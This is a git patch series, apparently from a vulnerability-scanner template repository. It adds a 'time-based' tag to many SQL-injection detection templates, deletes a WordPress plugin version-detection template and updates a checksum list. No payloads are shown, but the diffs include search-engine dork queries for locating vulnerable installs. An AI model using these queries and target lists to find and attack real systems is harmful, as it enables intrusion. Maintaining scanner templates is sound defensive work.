-25,7 +25,7 @@ info: product: learnpress shodan-query: html:"/wp-content/plugins/learnpress" fofa-query: body="/wp-content/plugins/learnpress" - tags: cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated + tags: time-based,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-9465.yaml b/http/cves/2024/CVE-2024-9465.yaml index 8cdde03ee9..b79fa60746 100644 --- a/http/cves/2024/CVE-2024-9465.yaml +++ b/http/cves/2024/CVE-2024-9465.yaml @@ -24,7 +24,7 @@ info: vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 - tags: cve,cve2024,palo-alto,sqli + tags: time-based,cve,cve2024,palo-alto,sqli flow: http(1) && http(2) diff --git a/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml index 43e84fcbeb..58477c1d9c 100644 --- a/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml +++ b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: app="HJSOFT-HCM" - tags: sqli,hjsoft,management-system + tags: time-based,sqli,hjsoft,management-system http: - raw: diff --git a/http/vulnerabilities/other/applezeed-sqli.yaml b/http/vulnerabilities/other/applezeed-sqli.yaml index ff00246289..10fd9cebea 100644 --- a/http/vulnerabilities/other/applezeed-sqli.yaml +++ b/http/vulnerabilities/other/applezeed-sqli.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 google-query: intext:"Power BY applezeed.com" - tags: sqli,unauth,applezeed + tags: time-based,sqli,unauth,applezeed http: - raw: @@ -30,4 +30,4 @@ http: - 'status_code == 200' condition: and -# digest: 4b0a00483046022100dfd17937eeadee3d65e927bb9326dfd03627b9c1df57de47c1ce8a87805ea246022100dcb6fd585f503ee0b57ec45c6289753f1754e08023d53e06c94571ec75c047f1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dfd17937eeadee3d65e927bb9326dfd03627b9c1df57de47c1ce8a87805ea246022100dcb6fd585f503ee0b57ec45c6289753f1754e08023d53e06c94571ec75c047f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/azon-dominator-sqli.yaml b/http/vulnerabilities/other/azon-dominator-sqli.yaml index 3af93968ba..4fc7ff9c8f 100644 --- a/http/vulnerabilities/other/azon-dominator-sqli.yaml +++ b/http/vulnerabilities/other/azon-dominator-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: "Azon Dominator" - tags: azon,dominator,sqli + tags: time-based,azon,dominator,sqli http: - raw: diff --git a/http/vulnerabilities/other/csz-cms-sqli.yaml b/http/vulnerabilities/other/csz-cms-sqli.yaml index eb09bc77f6..94f40c647b 100644 --- a/http/vulnerabilities/other/csz-cms-sqli.yaml +++ b/http/vulnerabilities/other/csz-cms-sqli.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: packetstorm,sqli,csz,cms + tags: time-based,packetstorm,sqli,csz,cms http: - raw: @@ -28,4 +28,4 @@ http: - 'contains(body, "CSZ CMS")' condition: and -# digest: 4a0a00473045022006993fcb25c049e956bf7b0ad9c725cc8d9558aabe9394aa669e94bee59d9489022100a1bd51fe83f16743a47530a19015ccad81dea74b907195083cf5563a808ebef6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022006993fcb25c049e956bf7b0ad9c725cc8d9558aabe9394aa669e94bee59d9489022100a1bd51fe83f16743a47530a19015ccad81dea74b907195083cf5563a808ebef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index 40cd614df2..8b53637888 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -17,7 +17,7 @@ info: product: e-cology shodan-query: ecology_JSessionid fofa-query: app="æł›ćŸź-捏搌択慬OA" - tags: ecology,ecology-oa,sqli + tags: time-based,ecology,ecology-oa,sqli http: - raw: diff --git a/http/vulnerabilities/other/fumengyun-sqli.yaml b/http/vulnerabilities/other/fumengyun-sqli.yaml index 197a50df8c..b24eccbfd3 100644 --- a/http/vulnerabilities/other/fumengyun-sqli.yaml +++ b/http/vulnerabilities/other/fumengyun-sqli.yaml @@ -22,7 +22,7 @@ info: max-request: 1 shodan-query: title:"歚盟äș‘ " fofa-query: title="歚盟äș‘ " - tags: fumasoft,sqli + tags: time-based,fumasoft,sqli flow: http(1) && http(2) diff --git a/http/vulnerabilities/other/groomify-sqli.yaml b/http/vulnerabilities/other/groomify-sqli.yaml index d44c74039a..3362474f32 100644 --- a/http/vulnerabilities/other/groomify-sqli.yaml +++ b/http/vulnerabilities/other/groomify-sqli.yaml @@ -12,7 +12,7 @@ info: metadata: verified: "true" max-request: 1 - tags: sqli,groomify,unauth + tags: time-based,sqli,groomify,unauth http: - raw: @@ -31,4 +31,4 @@ http: - contains(body, 'value=\"deneme') condition: and -# digest: 4b0a00483046022100fda9980ba40b20fb868d13705d7db4a186fc38bee4f6b9830a2be5fc925a49c2022100e4e368ed18b2edf18a26b2f062058ef20c8627510f6e800b2904103ce46e744b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fda9980ba40b20fb868d13705d7db4a186fc38bee4f6b9830a2be5fc925a49c2022100e4e368ed18b2edf18a26b2f062058ef20c8627510f6e800b2904103ce46e744b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/opencart-core-sqli.yaml b/http/vulnerabilities/other/opencart-core-sqli.yaml index 7ffbd28277..d86ec91230 100644 --- a/http/vulnerabilities/other/opencart-core-sqli.yaml +++ b/http/vulnerabilities/other/opencart-core-sqli.yaml @@ -17,7 +17,7 @@ info: fofa-query: icon_hash="-1443008128" product: opencart vendor: opencart - tags: opencart,sqli + tags: time-based,opencart,sqli flow: http(1) && http(2) http: diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml index 1bd189e097..72ff9c11dd 100644 --- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml +++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 fofa-query: "js/PSExtend.js" - tags: sqli,pingsheng + tags: time-based,sqli,pingsheng http: - raw: diff --git a/http/vulnerabilities/other/pmb-sqli.yaml b/http/vulnerabilities/other/pmb-sqli.yaml index 20e7e32c57..3100008247 100644 --- a/http/vulnerabilities/other/pmb-sqli.yaml +++ b/http/vulnerabilities/other/pmb-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 google-query: inurl:"opac_css" - tags: sqli,unauth,pmb + tags: time-based,sqli,unauth,pmb http: - raw: diff --git a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml index eb0de1cfc5..9bd17cd4c7 100644 --- a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml +++ b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml @@ -11,7 +11,7 @@ info: metadata: vendor: i-netsolution product: readymade-unilevel-ecommerce - tags: ecommerce,readymade,sqli + tags: time-based,ecommerce,readymade,sqli http: - raw: diff --git a/http/vulnerabilities/other/sitemap-sql-injection.yaml b/http/vulnerabilities/other/sitemap-sql-injection.yaml index e57911d416..cbf2f3dd36 100644 --- a/http/vulnerabilities/other/sitemap-sql-injection.yaml +++ b/http/vulnerabilities/other/sitemap-sql-injection.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 2 google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap - tags: misconfig,sitemap,sqli + tags: time-based,misconfig,sitemap,sqli http: - raw: diff --git a/http/vulnerabilities/other/stackposts-sqli.yaml b/http/vulnerabilities/other/stackposts-sqli.yaml index 405d35ccf0..3f7fcf2def 100644 --- a/http/vulnerabilities/other/stackposts-sqli.yaml +++ b/http/vulnerabilities/other/stackposts-sqli.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"stackposts" - tags: sqli,unauth,stackposts + tags: time-based,sqli,unauth,stackposts http: - raw: diff --git a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml index e3c73ef8f1..15117013b6 100644 --- a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml +++ b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.component:"Prestashop" - tags: prestashop,sqli + tags: time-based,prestashop,sqli http: - raw: diff --git a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml index 419d8d16a9..fb8bdcfe59 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.component:"vBulletin" product: vbulletin vendor: vbulletin - tags: packetstorm,vbulletin,ajaxreg,sqli + tags: time-based,packetstorm,vbulletin,ajaxreg,sqli http: - raw: diff --git a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml index 4002fe7efe..b55d308b79 100755 --- a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml +++ b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: app="䞇户眑络-ezOFFICE" - tags: wanhu,sqli + tags: time-based,wanhu,sqli http: - raw: @@ -30,4 +30,4 @@ http: - 'contains_all(body, "iSignature", "DoYFSignature")' condition: and -# digest: 4a0a00473045022016f9af257412b4bfe0762314c3f3971596633859cfa90626787c8efea19e60a30221009eeccd9426f5c7a49e0d377e2335c4b191262964c243a24357babd9b63be858b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022016f9af257412b4bfe0762314c3f3971596633859cfa90626787c8efea19e60a30221009eeccd9426f5c7a49e0d377e2335c4b191262964c243a24357babd9b63be858b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml index b980b6b665..53910072bf 100644 --- a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml +++ b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated + tags: time-based,sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated http: - raw: @@ -34,4 +34,4 @@ http: - 'contains(body, "abc-result-header")' condition: and -# digest: 4a0a00473045022100911dda2c9ecb635c07a0eb8758dac8adfab1112796dc578775f0a197ac5425b7022064f018e0b0f597b3799bde3c6b552bba4265318edae79251a0507484458e0e92:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100911dda2c9ecb635c07a0eb8758dac8adfab1112796dc578775f0a197ac5425b7022064f018e0b0f597b3799bde3c6b552bba4265318edae79251a0507484458e0e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml index 8a1f76aac0..7a7f7525cf 100644 --- a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: wpscan,sqli,wp,wp-plugin,wordpress,leaguemanager,unauth + tags: time-based,wpscan,sqli,wp,wp-plugin,wordpress,leaguemanager,unauth http: - raw: @@ -30,4 +30,4 @@ http: - 'contains(body, "LeagueManagerAjaxL10n")' condition: and -# digest: 4b0a00483046022100e212ee414bbf491c941f5bac4f68e99f9e38f93a235f2992247bc719a91a7a66022100f74d6a19195458235dba7e2b26e2359e9ffb5bddcb4c627597df35ff2fce94b2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e212ee414bbf491c941f5bac4f68e99f9e38f93a235f2992247bc719a91a7a66022100f74d6a19195458235dba7e2b26e2359e9ffb5bddcb4c627597df35ff2fce94b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml index 7c83623a9d..e8604e4d27 100644 --- a/http/vulnerabilities/wordpress/notificationx-sqli.yaml +++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 2 - tags: wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection + tags: time-based,wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection http: - raw: @@ -42,4 +42,4 @@ http: - '"home":"(.*?)",' internal: true -# digest: 4b0a00483046022100f473a033b58bb46b8a4779f5d0d2ec2c6543e79bb03a99f69ee0dcf385b1266b022100cf23b383f29c180f3df37238343ed61437997b07640ffa5f62ab36c2da806b94:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f473a033b58bb46b8a4779f5d0d2ec2c6543e79bb03a99f69ee0dcf385b1266b022100cf23b383f29c180f3df37238343ed61437997b07640ffa5f62ab36c2da806b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml index 18ed4296d2..713d2a8c56 100644 --- a/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/adiaha-hotel/" - tags: sqli,adivaha,wordpress,wp,wp-plugin + tags: time-based,sqli,adivaha,wordpress,wp,wp-plugin http: - raw: @@ -29,4 +29,4 @@ http: - contains(body, "adivaha") condition: and -# digest: 4b0a00483046022100b3a6c915a2cba4aa0cf4d49ea69f73504c90445b3f53b601f6527a9de5b2870c022100ca39b2fa5b1f556f4ae4c7c7a16655371c7272b8321f0d04280f68a70293ecd0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b3a6c915a2cba4aa0cf4d49ea69f73504c90445b3f53b601f6527a9de5b2870c022100ca39b2fa5b1f556f4ae4c7c7a16655371c7272b8321f0d04280f68a70293ecd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml index d62895a93e..685f6699ee 100644 --- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress + tags: time-based,wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml b/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml index c4af86875a..4d47ef1ff9 100644 --- a/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/smart-manager-for-wp-e-commerce/" - tags: wpscan,wp,wp-plugin,wordpress,smart-manager-for-wp-e-commerce,sqli + tags: time-based,wpscan,wp,wp-plugin,wordpress,smart-manager-for-wp-e-commerce,sqli http: - raw: @@ -39,4 +39,4 @@ http: - 'contains(body_2, "rel=\"preconnect") || contains(body, "Error")' condition: and -# digest: 4b0a00483046022100d48833d917b76837f53e578260bb9d0de3214e380835f7dcabd526d0f4256a000221008a9469351298a08125b9eac1101e26f43e0a4b50583f0fbf6df5adc46cf16cc9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d48833d917b76837f53e578260bb9d0de3214e380835f7dcabd526d0f4256a000221008a9469351298a08125b9eac1101e26f43e0a4b50583f0fbf6df5adc46cf16cc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml index 24d86729ca..c8781f7af9 100644 --- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml @@ -19,7 +19,7 @@ info: vendor: veronalabs product: wp_statistics publicwww-query: /wp-content/plugins/wp-statistics/ - tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp + tags: time-based,sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp flow: http(1) && http(2) http: diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml index f57ffede0a..a96f3f7908 100644 --- a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: wpscan,wp,wp-plugin,wordpress,zero-spam,sqli,unauth + tags: time-based,wpscan,wp,wp-plugin,wordpress,zero-spam,sqli,unauth http: - raw: @@ -32,4 +32,4 @@ http: - 'contains(body, "zerospam-js")' condition: and -# digest: 4b0a00483046022100e3bfba15a72ac2cdc4fea28e066640859930a59abd2c016a2c3ad36fccca4072022100b20649152abf3ec807a126cc48618751466e929e4794c2b1b501a6b2755d341d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e3bfba15a72ac2cdc4fea28e066640859930a59abd2c016a2c3ad36fccca4072022100b20649152abf3ec807a126cc48618751466e929e4794c2b1b501a6b2755d341d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml index f907b9dab1..a972c7dd12 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 fofa-query: icon_hash="-299520369" - tags: yonyou,grp,sqli + tags: time-based,yonyou,grp,sqli flow: http(1) && http(2) diff --git a/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml index 4230b19e5d..c929deee00 100644 --- a/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true fofa-query: app="甹揋-NC-Cloud" - tags: sqli,yonyou,ufida + tags: time-based,sqli,yonyou,ufida http: - raw: From 6c0c90be79568fac8b20c61f5a99e9e7022a5a29 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 14 Oct 2024 19:35:01 +0700 Subject: [PATCH 063/218] Delete http/technologies/wordpress/plugins/burst-statistics.yaml --- .../wordpress/plugins/burst-statistics.yaml | 48 ------------------- 1 file changed, 48 deletions(-) delete mode 100644 http/technologies/wordpress/plugins/burst-statistics.yaml diff --git a/http/technologies/wordpress/plugins/burst-statistics.yaml b/http/technologies/wordpress/plugins/burst-statistics.yaml deleted file mode 100644 index 055268ad8f..0000000000 --- a/http/technologies/wordpress/plugins/burst-statistics.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: wordpress-burst-statistics - -info: - name: Burst Statistics – Privacy-Friendly Analytics for WordPress Detection - author: ricardomaia - severity: info - reference: - - https://wordpress.org/plugins/burst-statistics/ - metadata: - plugin_namespace: burst-statistics - wpscan: https://wpscan.com/plugin/burst-statistics - tags: tech,wordpress,wp-plugin,top-200 - -http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/burst-statistics/readme.txt" - - payloads: - last_version: helpers/wordpress/plugins/burst-statistics.txt - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' From fdcd4b51db6ee61d896d570c2fa908eb6bb0165b Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 14 Oct 2024 12:35:29 +0000 Subject: [PATCH 064/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b2572b5f5b..5f881c2947 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -437,7 +437,7 @@ dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:dd74fab89b79b6fb65fc5743f15aaf20ec2 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:322e63c2fde38a3f84d349820850fc73bac1c936 dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0e36bc4224 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 -dast/vulnerabilities/sqli/sqli-error-based.yaml:91639f97386e1a2d809d8f943ea24a51f40743e1 +dast/vulnerabilities/sqli/sqli-error-based.yaml:9ada55338dfa2695da8ffda107f47954a6f843c7 dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 dast/vulnerabilities/ssrf/blind-ssrf.yaml:27e68a58e240f97f21f3e0be91a88253d459a830 dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 @@ -936,10 +936,10 @@ helpers/wordpress/plugins/ad-inserter.txt:412cf6c869a88a8a695efd21f4019fb5f95704 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 -helpers/wordpress/plugins/advanced-custom-fields.txt:d8197c09011824d1db05df46ea20c7e7e1c19496 +helpers/wordpress/plugins/advanced-custom-fields.txt:e7da2a0745fb6eea51b8db7996a4fb6d78cdde22 helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:139d14809b617dbc38f69bf8b87b985441ac3b34 +helpers/wordpress/plugins/all-in-one-seo-pack.txt:11c21d25c5f721b65beda2f8949654938e0983ab helpers/wordpress/plugins/all-in-one-wp-migration.txt:2664d4d92d63cd64b798e0938ea472bb83b79e50 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 @@ -989,7 +989,7 @@ helpers/wordpress/plugins/easy-wp-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237 helpers/wordpress/plugins/elementor.txt:db88e39a3a3e96302cf700c7e417205d0a99fb3d helpers/wordpress/plugins/elementskit-lite.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 -helpers/wordpress/plugins/envato-elements.txt:3537bdf1582c4a071fcc868f5961e811e63f2ede +helpers/wordpress/plugins/envato-elements.txt:304dfea8281c49f77ad7dfa2a904794d3b8ddaa1 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:89e9e8934da47fea559fb02759f5b3ba45efe5ca helpers/wordpress/plugins/ewww-image-optimizer.txt:0ff9f22422909931ae84d9591d77f81147106c05 helpers/wordpress/plugins/extendify.txt:5d2f3e3f068f2a9a369155392e3f7e64dbd5ba83 @@ -1044,7 +1044,7 @@ helpers/wordpress/plugins/loginpress.txt:5f022945150b402cb3e470acc3818847b3dc5e0 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:5f4a5c18721bec47a3562b0c38ed156cd2e91c0b helpers/wordpress/plugins/mailpoet.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f -helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 +helpers/wordpress/plugins/maintenance.txt:aa1cc400c8e8c75630f1392a15ed34d52e793a65 helpers/wordpress/plugins/mainwp-child.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/malcare-security.txt:f7693aa69d1a38f3b415822c60b85418a2499e8e helpers/wordpress/plugins/megamenu.txt:f85383fcd7c211714084d7fca897998d7d759c5d @@ -1052,11 +1052,11 @@ helpers/wordpress/plugins/members.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/meta-box.txt:14e90d2052196043a0c73a1d5d9e01bb9b905b02 helpers/wordpress/plugins/metform.txt:27e1606dc0a2a0c2fa59fc7f5fefdaeacc0b2794 helpers/wordpress/plugins/ml-slider.txt:9197d6d1f4e061a3a22d4ee7448b0fdbbc40c347 -helpers/wordpress/plugins/newsletter.txt:7432a36078c351a60d2d95174b7272e0d03f5f1f +helpers/wordpress/plugins/newsletter.txt:7997f017232e3787b80ece3766f88ed86b1ee1ba helpers/wordpress/plugins/nextend-facebook-connect.txt:76352622a937abb841a04340015012a42290add0 helpers/wordpress/plugins/nextgen-gallery.txt:5d3c8a2aab67c1180ad6a53d03c70a9db8542e1a helpers/wordpress/plugins/ninja-forms.txt:470958dd9db82b472bd7ca29cb314b76859d78a9 -helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 +helpers/wordpress/plugins/ocean-extra.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f helpers/wordpress/plugins/official-facebook-pixel.txt:9a0a06f6eb18bf496057acce15162dc100f43480 helpers/wordpress/plugins/one-click-demo-import.txt:3a8e01bbd716628be7b89f1ec085442592846654 helpers/wordpress/plugins/optinmonster.txt:cc44575d6561ec2fa37929299963874b6093eccb @@ -1092,7 +1092,7 @@ helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076 helpers/wordpress/plugins/siteguard.txt:62c0d70e952578b13a6913ef9989b4ad0f8fa884 helpers/wordpress/plugins/siteorigin-panels.txt:ee64babdd7103f7b28c430a3fad844c6abf96b27 helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 -helpers/wordpress/plugins/so-widgets-bundle.txt:e1bb1fff7a3d7bf41fdbdeec596fc625183cba41 +helpers/wordpress/plugins/so-widgets-bundle.txt:c26ccce86a0bfce71ba888599b4b24d41d3113d3 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166bfaf866032133ae1ec337f07572 @@ -1106,7 +1106,7 @@ helpers/wordpress/plugins/the-events-calendar.txt:274048f8c969245867e8093260c0bb helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:e0f7c4db084212451afd4076bf9be01e0a1467da -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:46627bd3681b28deaa5e3f6ac006cd2dcc782893 +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:b778beffacdf8df9b46cdc546bca567d44e6d6b0 helpers/wordpress/plugins/under-construction-page.txt:93c73a1987305f0a1f548b0025a3cb9e15bf420f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:5a13f9241243c2d9d28367028c116b0cf92f566d @@ -7817,7 +7817,7 @@ http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96 